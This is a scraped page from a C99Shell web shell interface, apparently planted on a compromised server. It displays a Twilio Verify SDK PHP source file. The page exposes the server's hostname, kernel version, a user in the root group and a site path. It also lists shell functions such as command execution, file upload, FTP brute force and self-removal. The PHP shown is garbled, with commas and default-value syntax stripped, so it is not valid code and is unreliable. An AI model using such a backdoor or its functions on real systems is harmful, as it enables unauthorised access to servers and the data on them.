!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/twilio/sdk/src/Twilio/Rest/Verify/V2/   drwxr-xr-x
Free 28.63 GB of 117.98 GB (24.27%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     VerificationAttemptsSummaryOptions.php (6.53 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This code was generated by
 * \ / _    _  _|   _  _
 * | (_)\/(_)(_|\/| |(/_  v1.0.0
 * /       /
 */

namespace Twilio\Rest\Verify\V2;

use 
Twilio\Options;
use 
Twilio\Values;

abstract class 
VerificationAttemptsSummaryOptions {
    
/**
     * @param string $verifyServiceSid Filter the verification attempts considered
     *                                 on the summary by verify service.
     * @param \DateTime $dateCreatedAfter Consider verification attempts create
     *                                    after this date on the summary.
     * @param \DateTime $dateCreatedBefore Consider verification attempts created
     *                                     before this date on the summary.
     * @param string $country Filter verification attempts considered on the
     *                        summary by destination country.
     * @param string $channel Filter verification attempts considered on the
     *                        summary by communication channel.
     * @param string $destinationPrefix Filters the attempts considered on the
     *                                  summary by destination prefix.
     * @return FetchVerificationAttemptsSummaryOptions Options builder
     */
    
public static function fetch(string $verifyServiceSid Values::NONE\DateTime $dateCreatedAfter Values::NONE\DateTime $dateCreatedBefore Values::NONEstring $country Values::NONEstring $channel Values::NONEstring $destinationPrefix Values::NONE): FetchVerificationAttemptsSummaryOptions {
        return new 
FetchVerificationAttemptsSummaryOptions($verifyServiceSid$dateCreatedAfter$dateCreatedBefore$country$channel$destinationPrefix);
    }
}

class 
FetchVerificationAttemptsSummaryOptions extends Options {
    
/**
     * @param string $verifyServiceSid Filter the verification attempts considered
     *                                 on the summary by verify service.
     * @param \DateTime $dateCreatedAfter Consider verification attempts create
     *                                    after this date on the summary.
     * @param \DateTime $dateCreatedBefore Consider verification attempts created
     *                                     before this date on the summary.
     * @param string $country Filter verification attempts considered on the
     *                        summary by destination country.
     * @param string $channel Filter verification attempts considered on the
     *                        summary by communication channel.
     * @param string $destinationPrefix Filters the attempts considered on the
     *                                  summary by destination prefix.
     */
    
public function __construct(string $verifyServiceSid Values::NONE\DateTime $dateCreatedAfter Values::NONE\DateTime $dateCreatedBefore Values::NONEstring $country Values::NONEstring $channel Values::NONEstring $destinationPrefix Values::NONE) {
        
$this->options['verifyServiceSid'] = $verifyServiceSid;
        
$this->options['dateCreatedAfter'] = $dateCreatedAfter;
        
$this->options['dateCreatedBefore'] = $dateCreatedBefore;
        
$this->options['country'] = $country;
        
$this->options['channel'] = $channel;
        
$this->options['destinationPrefix'] = $destinationPrefix;
    }

    
/**
     * Filter used to consider only Verification Attempts of the given verify service on the summary aggregation.
     *
     * @param string $verifyServiceSid Filter the verification attempts considered
     *                                 on the summary by verify service.
     * @return $this Fluent Builder
     */
    
public function setVerifyServiceSid(string $verifyServiceSid): self {
        
$this->options['verifyServiceSid'] = $verifyServiceSid;
        return 
$this;
    }

    
/**
     * Datetime filter used to consider only Verification Attempts created after this datetime on the summary aggregation. Given as GMT in RFC 2822 format.
     *
     * @param \DateTime $dateCreatedAfter Consider verification attempts create
     *                                    after this date on the summary.
     * @return $this Fluent Builder
     */
    
public function setDateCreatedAfter(\DateTime $dateCreatedAfter): self {
        
$this->options['dateCreatedAfter'] = $dateCreatedAfter;
        return 
$this;
    }

    
/**
     * Datetime filter used to consider only Verification Attempts created before this datetime on the summary aggregation. Given as GMT in RFC 2822 format.
     *
     * @param \DateTime $dateCreatedBefore Consider verification attempts created
     *                                     before this date on the summary.
     * @return $this Fluent Builder
     */
    
public function setDateCreatedBefore(\DateTime $dateCreatedBefore): self {
        
$this->options['dateCreatedBefore'] = $dateCreatedBefore;
        return 
$this;
    }

    
/**
     * Filter used to consider only Verification Attempts sent to the specified destination country on the summary aggregation.
     *
     * @param string $country Filter verification attempts considered on the
     *                        summary by destination country.
     * @return $this Fluent Builder
     */
    
public function setCountry(string $country): self {
        
$this->options['country'] = $country;
        return 
$this;
    }

    
/**
     * Filter Verification Attempts considered on the summary aggregation by communication channel. Valid values are `SMS` and `CALL`
     *
     * @param string $channel Filter verification attempts considered on the
     *                        summary by communication channel.
     * @return $this Fluent Builder
     */
    
public function setChannel(string $channel): self {
        
$this->options['channel'] = $channel;
        return 
$this;
    }

    
/**
     * Filter the Verification Attempts considered on the summary aggregation by Destination prefix. It is the prefix of a phone number in E.164 format.
     *
     * @param string $destinationPrefix Filters the attempts considered on the
     *                                  summary by destination prefix.
     * @return $this Fluent Builder
     */
    
public function setDestinationPrefix(string $destinationPrefix): self {
        
$this->options['destinationPrefix'] = $destinationPrefix;
        return 
$this;
    }

    
/**
     * Provide a friendly representation
     *
     * @return string Machine friendly representation
     */
    
public function __toString(): string {
        
$options \http_build_query(Values::of($this->options), ''' ');
        return 
'[Twilio.Verify.V2.FetchVerificationAttemptsSummaryOptions ' $options ']';
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0047 ]--